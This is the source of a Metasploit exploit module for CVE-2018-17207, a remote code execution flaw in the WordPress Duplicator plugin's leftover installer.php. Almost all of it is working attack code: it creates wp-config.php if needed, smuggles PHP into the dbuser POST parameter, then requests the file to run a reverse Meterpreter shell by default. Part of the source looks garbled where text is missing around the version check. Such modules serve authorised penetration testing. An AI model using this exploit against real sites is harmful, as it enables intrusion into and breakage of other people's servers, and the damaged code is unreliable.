## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ManualRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'Snapcreek Duplicator WordPress plugin installer.php code injection', 'Description' => %q{ When the WordPress plugin Duplicator restores a backup, it leaves dangerous files in the filesystem such as installer.php and installer-backup.php. These files allow anyone to call a function that overwrite the wp-config.php file AND this function does not sanitize POST parameters before inserting them inside the wp-config.php file, leading to arbitrary PHP code execution. WARNING: This exploit WILL break the wp-config.php file. If possible try to restore backups of the configuration after the exploit to make the WordPress site work again. }, 'Author' => [ 'Julien Legras ', 'Thomas Chauchefoin ' ], 'References' => [ ['URL', 'https://www.synacktiv.com/ressources/advisories/WordPress_Duplicator-1.2.40-RCE.pdf'], ['WPVDB', '9123'], ['CVE', '2018-17207'] ], 'License' => MSF_LICENSE, 'Privileged' => false, 'DisclosureDate' => 'Aug 29 2018', 'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/reverse_tcp' }, 'Platform' => 'php', 'Arch' => ARCH_PHP, 'Targets' => [['WordPress Duplicator <= 1.2.40', {}]], 'DefaultTarget' => 0)) register_options([ OptString.new('TARGETURI', [true, "The TARGETURI where installer.php or installer-backup.php is located", "/installer.php"]), ]) end def check tpath = normalize_uri(datastore['TARGETURI']) print_status("Checking uri #{rhost+tpath}") response = send_request_raw({ 'uri' => tpath}) version = response.body.to_s.scan( /version: ([^<]*) tpath_wp_config}) if response.code == 404 # we have to perform action_step 2 to create the wp-config.php file. print_status("This WordPress was not restored. Creating the wp-config.php file...") # 1. GET the installer.php to retrieve the archive name. response = send_request_cgi({'uri' => normalize_uri(datastore['TARGETURI'])}) archive_name = response.body.to_s.scan( /value="([^"]*.zip)"/) if archive_name.length > 0 archive_name = archive_name.first.first # 2. Perform the 1st step to actually create the wp-config.php file. response = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(datastore['TARGETURI']), 'vars_post' => { 'action_ajax' => "1", 'action_step' => "1", 'archive_name' => archive_name, 'archive_engine' => "ziparchive", 'exe_safe_mode' => "0", 'archive_filetime' => "current", 'logging' => "1" } }) if response.code == 200 print_status("Successfully created the wp-config.php file!") else print_error("The archive file #{archive_name} was probably deleted.") return end else print_error("Failed to retrieve the archive name, cannot create the wp-config.php file") return end end # 2. Exploit the code injection. print_status("All good! Injecting PHP code in the wp-config.php file...") response = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(datastore['TARGETURI']), 'vars_post' => { 'action_ajax' => "3", 'action_step' => "3", 'dbhost' => rand_text_alphanumeric(20), 'dbname' => rand_text_alphanumeric(20), 'dbpass' => rand_text_alphanumeric(20), 'dbuser' => "');" + payload_oneline + "/*", 'dbport' => rand_text_numeric(5) } }) print_status("Requesting wp-config.php to execute the payload...") response = send_request_cgi({ 'uri' => tpath_wp_config}) end end